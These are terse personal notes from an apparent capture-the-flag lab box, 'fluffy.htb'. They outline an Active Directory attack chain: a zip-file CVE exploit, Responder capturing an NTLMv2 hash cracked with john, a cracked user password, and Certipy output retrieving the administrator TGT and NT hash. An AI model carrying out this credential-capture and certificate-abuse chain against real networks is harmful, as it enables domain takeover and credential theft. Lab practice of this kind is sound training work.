use 2nd CVE with zip file exploit
user responder to capture NTLM v2 hash and cracked it with john
had to open ports on the firewall for responder
pass p.agila:prometheusx-303:FLUFFY
fuck certipy kicks my ass everytime
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[] Certificate identities: [] SAN UPN: ‘administrator@fluffy.htb’ [] Using principal: ‘administrator@fluffy.htb’ [] Trying to get TGT… [] Got TGT [] Saving credential cache to ‘administrator.ccache’ [] Wrote credential cache to ‘administrator.ccache’ [] Trying to retrieve NT hash for ‘administrator’ [*] Got hash for ‘administrator@fluffy.htb’: aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e